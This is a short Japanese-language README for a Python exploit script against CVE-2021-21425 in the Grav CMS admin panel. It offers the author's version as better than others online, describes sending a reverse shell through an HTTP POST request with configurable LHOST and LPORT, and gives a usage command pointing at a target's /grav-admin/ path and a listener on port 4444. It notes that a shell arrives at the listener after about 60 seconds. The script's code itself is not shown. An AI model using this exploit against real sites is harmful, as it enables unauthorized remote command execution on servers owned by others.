
Grav CMS管理パネルを標的としたCVE-2021-21425用のPythonエクスプロイトスクリプト。設定可能なLHOSTとLPORTを使用し、HTTP POSTリクエスト経由でリバースシェルを送信します。
これは私のバージョンです。インターネットでたくさん見つけましたが、それらは質が悪すぎます。
python3 exploit.py -u http://[IP]/grav-admin/ --lhost [YOUR TUN0 IP] --lport 4444
待ってください。60秒後にリスナーでシェルを取得できます。